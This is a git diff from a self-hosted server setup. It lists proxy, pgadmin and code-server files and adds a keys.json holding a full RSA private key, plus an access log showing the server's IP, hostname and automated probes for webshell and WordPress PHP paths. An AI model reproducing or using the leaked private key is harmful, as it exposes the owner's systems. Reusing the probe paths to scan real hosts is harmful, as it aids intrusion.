+./proxy-manager/data/logs/proxy-host-6_access.log.3.gz +./proxy-manager/data/logs/proxy-host-6_access.log.2.gz +./proxy-manager/data/logs/letsencrypt.log.2 +./proxy-manager/data/logs/letsencrypt-requests_access.log +./proxy-manager/data/logs/proxy-host-4_access.log +./proxy-manager/data/logs/letsencrypt.log.12 +./proxy-manager/data/logs/proxy-host-5_access.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.7 +./proxy-manager/data/logs/fallback_error.log +./proxy-manager/data/logs/proxy-host-6_error.log.2.gz +./proxy-manager/data/logs/proxy-host-5_access.log.3.gz +./proxy-manager/data/logs/proxy-host-5_error.log.3.gz +./proxy-manager/data/logs/proxy-host-1_error.log.3.gz +./proxy-manager/data/logs/proxy-host-2_access.log.2.gz +./proxy-manager/data/logs/proxy-host-3_access.log.2.gz +./proxy-manager/data/logs/proxy-host-5_error.log.2.gz +./proxy-manager/data/logs/letsencrypt.log.1 +./proxy-manager/data/logs/proxy-host-3_access.log +./proxy-manager/data/logs/letsencrypt.log.3 +./proxy-manager/data/logs/proxy-host-5_access.log.2.gz +./proxy-manager/data/logs/proxy-host-1_error.log +./proxy-manager/data/logs/proxy-host-2_access.log +./proxy-manager/data/logs/fallback_error.log.3.gz +./proxy-manager/data/logs/proxy-host-5_error.log.1.gz +./proxy-manager/data/logs/letsencrypt.log +./proxy-manager/data/logs/letsencrypt.log.14 +./proxy-manager/data/logs/proxy-host-5_access.log +./proxy-manager/data/logs/proxy-host-1_access.log.1.gz +./proxy-manager/data/logs/proxy-host-5_error.log +./proxy-manager/data/logs/proxy-host-9_error.log +./proxy-manager/data/logs/proxy-host-3_error.log.2.gz +./proxy-manager/data/logs/proxy-host-1_error.log.1.gz +./proxy-manager/data/logs/proxy-host-3_error.log.3.gz +./proxy-manager/data/logs/proxy-host-3_error.log.1.gz +./proxy-manager/data/logs/proxy-host-1_access.log.2.gz +./proxy-manager/data/logs/proxy-host-3_access.log.1.gz +./proxy-manager/data/logs/letsencrypt.log.5 +./proxy-manager/data/logs/fallback_access.log +./proxy-manager/data/logs/proxy-host-7_error.log +./proxy-manager/data/logs/proxy-host-4_error.log +./proxy-manager/data/logs/letsencrypt.log.11 +./proxy-manager/data/logs/proxy-host-3_error.log +./proxy-manager/data/logs/proxy-host-2_error.log +./proxy-manager/data/logs/proxy-host-6_error.log +./pgadmin +./pgadmin/data +./pgadmin/data/sessions +./pgadmin/data/sessions/c191ec66-78a1-4afd-955f-e50e8dbbc552 +./pgadmin/data/sessions/f7056bf2-b80f-4239-8c16-3531f8b88782 +./pgadmin/data/sessions/f566ecc0-32dd-45c7-869e-cfb900fd9aa7 +./pgadmin/data/sessions/61fa598a-479d-47dc-aee2-846812e6b40b +./pgadmin/data/sessions/36fa57da-8c82-47e8-8dd0-03c677ff8f6d +./pgadmin/data/sessions/42240d96-abd2-43ed-9e07-7ad0acd4dceb +./pgadmin/data/sessions/cc89aa8b-5867-4b73-90c0-0b15d117cb9f +./pgadmin/data/sessions/4717cbe5-3d95-425b-a873-df76df7af990 +./pgadmin/data/sessions/fc40d886-9fb0-48b2-810e-c77b9afcb6a2 +./pgadmin/data/sessions/190c2cfe-7b96-47e7-a7c7-78740413ec86 +./pgadmin/data/sessions/d1fd1e26-160e-4450-b2b6-dc28ad4273f1 +./pgadmin/data/sessions/a48ac178-5482-4835-87cc-fe0ed838bacf +./pgadmin/data/sessions/64c44127-f39a-4234-8785-9b515b32686f +./pgadmin/data/sessions/82e002e9-c7ef-4eb4-8fad-759b9d5577ca +./pgadmin/data/sessions/ef7f0484-f09d-44c1-b0b7-e56888795442 +./pgadmin/data/sessions/8821dc09-caca-4649-9f18-bc57cf371a06 +./pgadmin/data/sessions/3f887077-3a26-455d-b2ce-6be68ddc71e8 +./pgadmin/data/sessions/6404475f-50aa-42e0-9d35-b0a8f6e8a213 +./pgadmin/data/sessions/5c1020ff-954c-4132-902a-11a3750de23a +./pgadmin/data/sessions/7aa1e6c8-5c23-45ec-8156-972939ae60cf +./pgadmin/data/sessions/2561af04-52e0-422c-9f01-889aa086be13 +./pgadmin/data/sessions/f01d1cd0-5b3c-406d-8b54-f07f9436949e +./pgadmin/data/sessions/c8a2ea39-d07d-4c98-8be2-e3ddee9c5c99 +./pgadmin/data/sessions/ec936261-9676-4ff7-abc9-6af7557b45e5 +./pgadmin/data/sessions/d4434ef9-4105-403c-9245-25ddf5dfb391 +./pgadmin/data/sessions/3d3283e8-fbe4-487e-bc49-458ee1782020 +./pgadmin/data/sessions/fad7550e-eef9-4a4e-9f8b-8d771c7767a4 +./pgadmin/data/sessions/e2eab0f0-867e-4797-9619-7fb4f790b89f +./pgadmin/data/sessions/0f41e22e-b4b4-4776-9895-9fc12054ed71 +./pgadmin/data/sessions/c22428fe-dfc0-4a28-a32f-1f8965430004 +./pgadmin/data/sessions/c8857f63-f821-49b4-bf41-48727c00febd +./pgadmin/data/sessions/6c443079-e5e9-44c3-aa39-9be235ad4865 +./pgadmin/data/sessions/82e99852-9da3-45a8-8491-0c69e66d5be4 +./pgadmin/data/sessions/bf27abfe-c382-4e9d-8acf-9508133c4b15 +./pgadmin/data/sessions/2739c198-da4a-498e-aaaa-9c9ca291bbf1 +./pgadmin/data/sessions/98fdb91c-44cf-4379-a738-6b045733dee0 +./pgadmin/data/sessions/03c1a752-4ec5-430c-a965-aa355531bb1f +./pgadmin/data/sessions/8167652a-79dc-46b9-a3e7-203ac1840f84 +./pgadmin/data/sessions/c6f96af8-86b3-4bd2-9c65-c6b80ee60512 +./pgadmin/data/sessions/f27f3773-bd41-4870-adbc-298c08de6834 +./pgadmin/data/sessions/1960ac31-8625-48ba-aef3-f824a0739b59 +./pgadmin/data/sessions/4cf9b0b1-f129-43e0-82f0-9da65c5d5d00 +./pgadmin/data/sessions/df1c9e4b-c688-43af-8707-a967f124e2be +./pgadmin/data/sessions/a07c1cce-1999-49c3-b1e1-a59436e38522 +./pgadmin/data/sessions/e5b3bdd5-4aef-4366-bd21-9acd13188b78 +./pgadmin/data/sessions/4673f7fb-cab6-4347-8c0e-7a00937c3f16 +./pgadmin/data/sessions/4382c834-4294-45eb-a671-8ab12033f6b7 +./pgadmin/data/sessions/f2ca300d-051d-42b5-b5f9-be649054d293 +./pgadmin/data/sessions/eb5480bb-8183-4aed-8c44-5dba8a9de577 +./pgadmin/data/sessions/a508f434-c945-4db0-8927-e16f0e75813f +./pgadmin/data/sessions/68043fbf-2cff-4131-9807-562123306e7c +./pgadmin/data/sessions/081da418-bd99-4b43-aa84-f6e13a87f057 +./pgadmin/data/sessions/d985efdf-2cda-4d6e-a850-baf41946bdbf +./pgadmin/data/sessions/54349914-b165-48f3-bea8-ab8d224edd39 +./pgadmin/data/sessions/ea4d33f7-a8dd-4288-b9ef-2d1511286491 +./pgadmin/data/sessions/26f505ea-a69a-4e4d-8704-01e379913d52 +./pgadmin/data/sessions/7130585c-6a44-41f4-80fd-6f2c7c702eac +./pgadmin/data/sessions/8d434565-8c8d-4058-94d6-df582902ff67 +./pgadmin/data/sessions/4ed73362-1f27-4e50-a632-c3b6213f627e +./pgadmin/data/sessions/4c3ac76d-b38d-4e89-871e-7446ad86ce3a +./pgadmin/data/sessions/cbee53e3-2930-45b4-ac80-cec62d11365b +./pgadmin/data/sessions/2706ea12-544c-439c-bbfe-2881135fc5c2 +./pgadmin/data/sessions/19bc1463-7c1e-40a9-bd09-7d282590b903 +./pgadmin/data/sessions/4584d603-10f5-4767-920e-59c463d5f00b +./pgadmin/data/sessions/bc386c8c-87ae-4e20-8844-fee3703a0595 +./pgadmin/data/sessions/3e232ae5-0fb7-4107-8fe6-e64af4d0527b +./pgadmin/data/sessions/0ced9fd6-67f5-4e15-892d-f16f29bf2d53 +./pgadmin/data/sessions/45e62654-215d-433f-92ed-21bb664b0a5d +./pgadmin/data/sessions/f8f4cdc0-a960-4971-b380-3a3df159a3f7 +./pgadmin/data/sessions/5da591bf-697b-40b8-b850-5248b3f9948e +./pgadmin/data/sessions/62c7cafb-f9c3-4a0e-b88b-69015f4cdd8a +./pgadmin/data/sessions/76de99ed-2aa0-4a08-b488-08f30f00b115 +./pgadmin/data/sessions/6d5cdc12-98ae-4226-8c56-01a66ace1eb6 +./pgadmin/data/sessions/4fbb5992-1fbe-4451-b3b7-29b0318db683 +./pgadmin/data/sessions/aee5ec2f-8e5c-4a46-98f2-09842c70b28e +./pgadmin/data/sessions/0ab80fb4-e8e7-406d-b344-f49eba9ff931 +./pgadmin/data/sessions/dde5b219-4951-4165-8fd4-78c960f48b9e +./pgadmin/data/sessions/351775b2-78e4-499e-868d-4d29b5c6dc44 +./pgadmin/data/sessions/70be35ce-dedc-49e1-baa1-fc144a68e2dd +./pgadmin/data/sessions/1e5e0265-eae2-4b5b-a55b-cd60ebf3329d +./pgadmin/data/sessions/bb0e21bd-b9d5-4a23-b434-1065bbaa95de +./pgadmin/data/sessions/03321bce-cf49-427a-a351-c698a1e8b6c5 +./pgadmin/data/sessions/c9725e93-8daa-4593-adb6-cae2c08f9ff2 +./pgadmin/data/sessions/b96079ba-7bb1-4f2e-9a3c-e909f62b4482 +./pgadmin/data/sessions/dbe3af6d-f17b-40b9-89e2-f39320543100 +./pgadmin/data/sessions/638b9be8-028f-44cb-8989-36ea93b74eea +./pgadmin/data/sessions/2ed28be0-af44-427d-aebc-548f31f468e0 +./pgadmin/data/sessions/a3dc2446-3c67-4238-a8b2-c9fa71fbad7a +./pgadmin/data/sessions/46a19aed-8c32-4649-9190-e449bc59bc7b +./pgadmin/data/sessions/7c130b35-7cb9-488d-8576-ea9013268f03 +./pgadmin/data/sessions/b756eef0-4625-465d-bc5b-a84d0cb54bc1 +./pgadmin/data/sessions/60f20466-0f3c-459c-aef7-4fc0c091fe44 +./pgadmin/data/sessions/4c0d3bc1-5568-4b05-a134-0dfabe300266 +./pgadmin/data/sessions/24b3c1f7-7db5-46a1-8f9d-2bebf1f0fdce +./pgadmin/data/sessions/e4d91f15-4c9f-407e-9bed-4b54a9710348 +./pgadmin/data/sessions/e1dbb2c7-f692-49bf-9952-906e45cc061c +./pgadmin/data/sessions/2179bbb8-68eb-4d23-ab40-abd267a737ca +./pgadmin/data/sessions/451e0858-8495-4b2b-80e6-a806b23ebf20 +./pgadmin/data/sessions/11cb2bcb-cdd1-47cd-8bd7-2311df2c5fe9 +./pgadmin/data/sessions/4cd4231d-4650-478a-836d-587dd5fadf2d +./pgadmin/data/sessions/4dddbbca-9f36-4afe-91c5-dda07af51509 +./pgadmin/data/sessions/722e0de3-d430-4128-a2dc-0c2b98696529 +./pgadmin/data/sessions/ab34bced-831e-487d-9825-84f608ea3902 +./pgadmin/data/sessions/93c836f5-d79d-425b-bf03-dcabb528c14a +./pgadmin/data/sessions/418dd495-ee05-4922-a4b5-20d73b9e4546 +./pgadmin/data/sessions/0074a83f-e030-42ae-8c17-45565cbecfc9 +./pgadmin/data/sessions/ed9ea264-f245-424a-a083-d41f3e3677f2 +./pgadmin/data/sessions/987661e3-7d05-4a95-8b77-baa1d589e950 +./pgadmin/data/sessions/fe97b137-a0ea-4a78-97e1-3380e694b0fd +./pgadmin/data/sessions/f7a50bb2-86b0-4300-8230-1419184b77df +./pgadmin/data/sessions/3a0faa33-930b-4f10-b332-a7e980746c78 +./pgadmin/data/sessions/2d628d69-f6f7-486a-9262-bc18afb453af +./pgadmin/data/sessions/13426e7d-ab6c-4495-8e7d-86a537b15eee +./pgadmin/data/sessions/9b298e50-1684-493a-aa4c-013aa0dfa34d +./pgadmin/data/sessions/f03484f7-2430-4a0a-97ec-9da8e1f5ea8e +./pgadmin/data/sessions/83b8ec9d-cce8-40dd-92d2-b408fb9740b4 +./pgadmin/data/sessions/55b681bd-873c-4d01-b4be-3989d832a238 +./pgadmin/data/sessions/d4e8dbd2-54cf-46e1-b517-fc1e75d249e1 +./pgadmin/data/sessions/8d702279-6b43-4233-a353-8154dd414dd9 +./pgadmin/data/sessions/e2712981-434d-4e36-95f1-1a8bfdd104aa +./pgadmin/data/sessions/7e7fdf5e-cddd-47d9-9904-c2e3f0bb6584 +./pgadmin/data/sessions/47fe0485-1471-42bc-95cd-706a64f48628 +./pgadmin/data/sessions/d09cb1df-1944-4853-8a28-2b96d6e48172 +./pgadmin/data/sessions/cabc5443-1f25-4baa-935f-677ad0168302 +./pgadmin/data/sessions/e6c8fdcc-0d49-4d7b-b1c1-9e369dc4b462 +./pgadmin/data/sessions/e14cf22a-1d02-4b56-8e72-dc06b7680c58 +./pgadmin/data/sessions/afb4a566-5bbd-44ca-95a7-07f73b35a4b5 +./pgadmin/data/sessions/b5d9d584-a368-445a-a1a3-832c81ceecb8 +./pgadmin/data/sessions/dccb1427-3039-4d5b-99a3-aa1e0047c1d5 +./pgadmin/data/sessions/05d366d7-6fc8-4b0a-8f15-34e993390037 +./pgadmin/data/sessions/3ee96a8c-f9ab-4446-a2a5-f507c43c81ca +./pgadmin/data/sessions/aed3b509-f282-4a70-aefd-8187a7eec5a1 +./pgadmin/data/sessions/ce5f6384-c313-4ded-886b-b07ececd76cd +./pgadmin/data/sessions/1f914044-e28a-4209-adbe-3ef26a350f8f +./pgadmin/data/sessions/af349006-dc3d-4311-813f-b7b9a020bf80 +./pgadmin/data/sessions/2f9a5acd-4f90-41e6-b3ce-6c96fd759269 +./pgadmin/data/sessions/239da6ac-8ad1-4a6b-b744-1f0c277297f2 +./pgadmin/data/sessions/fafc224c-d56c-46f8-8e61-99acda95eea3 +./pgadmin/data/sessions/4702c0ea-8e09-45cf-b789-30e27eb5e3b9 +./pgadmin/data/sessions/ba1fe36d-33f0-406d-ac2d-b36f1a116e1a +./pgadmin/data/sessions/f2d9792d-a8f1-428b-8337-8e9d6f3443f7 +./pgadmin/data/sessions/3988bd08-5155-401d-99d6-02f2fb632f55 +./pgadmin/data/sessions/eda16ade-9d9f-414a-8568-f7cbdd846df5 +./pgadmin/data/sessions/dc94f41e-fce7-4511-8568-85f697d9c3ac +./pgadmin/data/sessions/f1d83a36-0b04-4f6d-b5e6-a5ceb6913d46 +./pgadmin/data/sessions/9ca18ada-194c-411c-aca2-dd39c9309f06 +./pgadmin/data/sessions/e894978f-3619-4507-8a8d-06ebd9d3b34b +./pgadmin/data/sessions/3a94a473-9331-4677-a456-c2f159644646 +./pgadmin/data/sessions/f9d18c1d-5bf5-415a-b1b2-f626cbff20a5 +./pgadmin/data/sessions/6ed6727c-6f53-4985-b61d-54ec2c5e21aa +./pgadmin/data/sessions/bcbba302-039d-4255-b59b-4f5c0ba4261e +./pgadmin/data/sessions/bc5dcd93-6f31-4c85-a71e-a5e2c3909ee4 +./pgadmin/data/sessions/81fa4503-512f-4ffc-b80c-a2cbe5ac6c6d +./pgadmin/data/sessions/8b244e1a-3450-46ae-bf7d-1c62cbf27efd +./pgadmin/data/sessions/57e8dde3-3c42-4ea9-b51b-61e0c7464689 +./pgadmin/data/sessions/7b270987-51d5-49ec-a211-efe040a3aad6 +./pgadmin/data/sessions/ac22993e-9fa9-4648-b831-00d09d4c1847 +./pgadmin/data/sessions/28cae61e-11d9-496f-a02a-61c9e6f7de81 +./pgadmin/data/sessions/4a10d8d1-c231-4e4a-b2da-11c41f1fb17b +./pgadmin/data/sessions/d85fb50c-159c-4126-a962-26b7d6069e7b +./pgadmin/data/sessions/ff45df81-4c63-4c3c-a8dd-049c6d620cd2 +./pgadmin/data/sessions/71210c05-6890-4a50-b357-ab9aa326676e +./pgadmin/data/sessions/cb104af0-04e6-4f15-a368-f77982452a6c +./pgadmin/data/sessions/ac393412-dcf8-4c91-bc17-7d1b5801acad +./pgadmin/data/sessions/48251b44-eba5-4052-a76e-86a6875136b9 +./pgadmin/data/sessions/1d6f0a85-d435-4576-a0fa-08a06278a27e +./pgadmin/data/sessions/3c8bf289-9347-409a-9f10-47d159e01372 +./pgadmin/data/sessions/cfa4a83e-c216-4605-b47c-a22793eba833 +./pgadmin/data/sessions/bf90f4cb-b073-4c6e-879a-254f1b482663 +./pgadmin/data/sessions/66915c98-f44d-46e5-b6b1-6b7f93a75ec8 +./pgadmin/data/sessions/49511e92-d0d3-4269-800b-ece9393f44da +./pgadmin/data/sessions/cda3d93a-d66a-40d6-b639-5889a54f18ae +./pgadmin/data/sessions/5e4fd04c-14ea-444b-8146-b16def80df51 +./pgadmin/data/sessions/eefdb208-868b-4f2f-b994-10e3fb60a027 +./pgadmin/data/sessions/049be04b-7f37-4e21-bc39-0c2a8b220599 +./pgadmin/data/sessions/c4ede5bb-f6d0-414b-ae56-7b02f6d70e5e +./pgadmin/data/sessions/6291cc65-910e-421f-88f8-52052e770880 +./pgadmin/data/sessions/0e57c4bc-ece3-4cee-8593-d29a4ac3eb32 +./pgadmin/data/sessions/d2a3c6f4-9445-4cce-a5e8-dc1086c17aa5 +./pgadmin/data/sessions/41dba666-775e-4db7-bab2-e9e8d24d6f69 +./pgadmin/data/sessions/be43131f-9131-4361-9a78-11fe22bc07fe +./pgadmin/data/sessions/4832b048-abfe-407a-abbc-5ab7349646dc +./pgadmin/data/sessions/9d89be8f-abc8-4e30-b87a-187d22ba3bb7 +./pgadmin/data/sessions/97c0ed8d-c8bb-4867-afdb-ed963a871162 +./pgadmin/data/sessions/786acf57-7b55-49a3-bbf4-d2ea7ac3af88 +./pgadmin/data/sessions/5f44b9f8-20b6-4f0f-8b35-fcbafb900d7d +./pgadmin/data/sessions/02a93934-cb4f-4990-9f17-3c9b0c0d41d8 +./pgadmin/data/sessions/be8c9ae6-3d6a-4c56-b296-7a316062e49e +./pgadmin/data/storage +./pgadmin/data/storage/kincses_gmail.com +./pgadmin/data/pgadmin4.db +./pgadmin/data/azurecredentialcache +./logs +./frontend +./frontend/uploads +./frontend/uploads/fe7a5e48-09af-4a3c-a51a-b7c97a20810e.png +./frontend/uploads/743f6905-83bc-4269-83bd-38098b10605b.png +./frontend/uploads/50369328-e8d0-4f07-b955-52bfc5bc4671.png +./frontend/uploads/1797321c-cd84-48a9-a4f5-7a063dd5386f.png +./frontend/uploads/f3d0f3f9-4112-4c8e-b2c6-558a9cace658.png +./frontend/uploads/3912a8ba-57f0-477c-9a27-597240407444.png +./frontend/uploads/6e62c849-21fc-4803-ab3b-e5b627649f30.png +./frontend/index_old.html +./frontend/index.html +./docker-compose_NAS_előtt.yml +./code-server-config +./code-server-config/extensions +./code-server-config/extensions/extensions.json +./code-server-config/data +./code-server-config/data/Machine +./code-server-config/data/User +./code-server-config/data/User/customBuiltinExtensionsCache.json +./code-server-config/data/User/History +./code-server-config/data/User/caches +./code-server-config/data/User/Backups +./code-server-config/data/User/settings.json +./code-server-config/data/User/snippets +./code-server-config/data/User/globalStorage +./code-server-config/data/User/systemExtensionsCache.json +./code-server-config/data/User/machineid +./code-server-config/data/User/workspaceStorage +./code-server-config/data/CachedProfilesData +./code-server-config/data/CachedProfilesData/__default__profile__ +./code-server-config/data/logs +./code-server-config/data/logs/20260120T003918 +./code-server-config/data/logs/20260120T172343 +./code-server-config/data/logs/20260120T004510 +./code-server-config/data/logs/20260120T175427 +./code-server-config/data/coder.json +./code-server-config/workspace +./alembic.ini +./Horgony_megjegyzések.txt diff --git a/proxy-manager/data/database.sqlite b/proxy-manager/data/database.sqlite new file mode 100755 index 0000000..f31f638 Binary files /dev/null and b/proxy-manager/data/database.sqlite differ diff --git a/proxy-manager/data/keys.json b/proxy-manager/data/keys.json new file mode 100755 index 0000000..7370370 --- /dev/null +++ b/proxy-manager/data/keys.json @@ -0,0 +1,4 @@ +{ + "key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAiln3gBlb/3Rw3E5ZVwVxuecWHnOHZKGhORwdV+Oq3jNkDrqy\n8P5JHiQIKw5JTPNoxJjFCHUbCBSC1+8Lhf17j9bJKdhDwPzskardROTQacdqCaMY\nz4ouRigyjD/wTaN9JlioWxQIJLNrQbj6B+TPomualNVxlUG0nofeDDGELs0Qyp4r\nOOSXTAoZRxvPEltqpm4zuF9joUqfDmZk5dPMuuZ3Xg13wZEE4xghmz8KRFHU3D98\n5BXdHU/Pjziu3LoasqXC9v6mOUXcSzvs41sK7duOmnGzMsaatbnf0y6Tr4BZGuxR\ndgWJNFxfr22/VZdQeM3EEGPuF4wlyAqH9X3/lQIDAQABAoIBAAOWudjUz5IczyCn\n16FuPrj3yZcYoBZ4Ktp0ZD53ZWNGKf5H0YR21Ca4AI49XKFmXv1aiSHjB8R547r+\nNGpRXPcqNyWiun8zEF/m8r5qwQ09Yv7FAEvB5dlkCYuhzPX2m7R28EcMifmJveqC\nhdnWkZxA9k2OC9g3UBwcoiHm1urv1Q1Y3N/mh0d0BzDfSlvYyhLfPElFw7elrreC\nEk/NWJ0byXLMeJ42F8SgDn3zAPBYAUmkiyiFdY4mV0tM4zT7X+euapACv17FWQWI\niO0Abt0QPemBEQRk+ZxZHSOCkhsZr5IkslmYEC7JXBOlOOusvMdCs9GejdaTqnH1\n9SeFD7ECgYEAxWJ/8l5/kvrDhRBoU44E6hfR+MGkNCQ3Bl2fHpxpDNxfZzuwrQVh\nYGGIvrs+PnIqqWp8MzYZ856YnF5yOTifDrpwkePmwnLGHXeMSo4m3936SqblRSQh\nlGUV5NZxH/UOTfmz9rQ2sG2cQ0qOiR94u6QOoox+1HzhBZ2TtY8eAEMCgYEAs2+p\nB/KUH7owfv7pNSvrmLPCTimfVAT/XODZEjPIp2fNwXBhGKMU10v6Irk6L+jmeOZX\n8sfKzwzi9Ex0w6pXwDca898X+6QOiMib/Q6GG8chROSkvyekuQO7P4/CBw2Z/7X2\nBXr4JD5i6tmIY0C2TlsmRZuht9pKmGQ6uEa4D0cCgYEAqVUyTJwTN+WXHK2RwrSg\ntK8QvCZrlyvGZNimbF1kpdrcobSMgjKOcl/aLz51TJ8myEaJHGn6Y4yYgfVoanyP\nv9PkRNROIFzUZ20q1r8SzJUjZy28nM89W5BI8xOg4viZd/2TDT9Xd43hM71fgHWW\nXuuEfqCnIeWsKeQgVu7bnv8CgYBJel8YfxCDEYaMaqxq9qpKZMobodW53TYI/ZZG\naugvDUXngbJxGU8OfvFWSM14EwJV3dWD+KanNNq3OZvTCC1Y6/fgh6nVhS/ieWvP\nK6RlOZz5DjwcfwpoLQv/kkndA4fde9DcG6gDh3yQOTYtlrFQ0uiQNpP5qq1DTD/z\neBolPwKBgQCozDz+CJgF5h5NfBojg2vrBC3Cutwm0UEgMie1FgluybeWI1oCimk1\nmNG+GmwwewNmOFOnV9WS23qePYZfw05vW+Rk0SdV2Z+Qqey3Ub8n0fPwn+mv8E12\nXu7IH7E6vKdMXUz5GuMFJE7WjTjcv8neEcFWCo0I8AIa5f6EOLCkcw==\n-----END RSA PRIVATE KEY-----", + "pub": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAiln3gBlb/3Rw3E5ZVwVx\nuecWHnOHZKGhORwdV+Oq3jNkDrqy8P5JHiQIKw5JTPNoxJjFCHUbCBSC1+8Lhf17\nj9bJKdhDwPzskardROTQacdqCaMYz4ouRigyjD/wTaN9JlioWxQIJLNrQbj6B+TP\nomualNVxlUG0nofeDDGELs0Qyp4rOOSXTAoZRxvPEltqpm4zuF9joUqfDmZk5dPM\nuuZ3Xg13wZEE4xghmz8KRFHU3D985BXdHU/Pjziu3LoasqXC9v6mOUXcSzvs41sK\n7duOmnGzMsaatbnf0y6Tr4BZGuxRdgWJNFxfr22/VZdQeM3EEGPuF4wlyAqH9X3/\nlQIDAQAB\n-----END PUBLIC KEY-----" +} \ No newline at end of file diff --git a/proxy-manager/data/logs/fallback_access.log b/proxy-manager/data/logs/fallback_access.log new file mode 100755 index 0000000..28ba457 --- /dev/null +++ b/proxy-manager/data/logs/fallback_access.log @@ -0,0 +1,16493 @@ +[11/Jan/2026:22:39:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[11/Jan/2026:22:44:31 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[11/Jan/2026:22:47:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[11/Jan/2026:22:49:00 +0000] 404 - GET http 92.249.249.197 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 79.133.126.183] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[11/Jan/2026:23:00:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[11/Jan/2026:23:13:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[11/Jan/2026:23:22:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:34 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/zwso.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_mna.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 104.28.214.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[11/Jan/2026:23:22:38 +0000] 404 - GET http 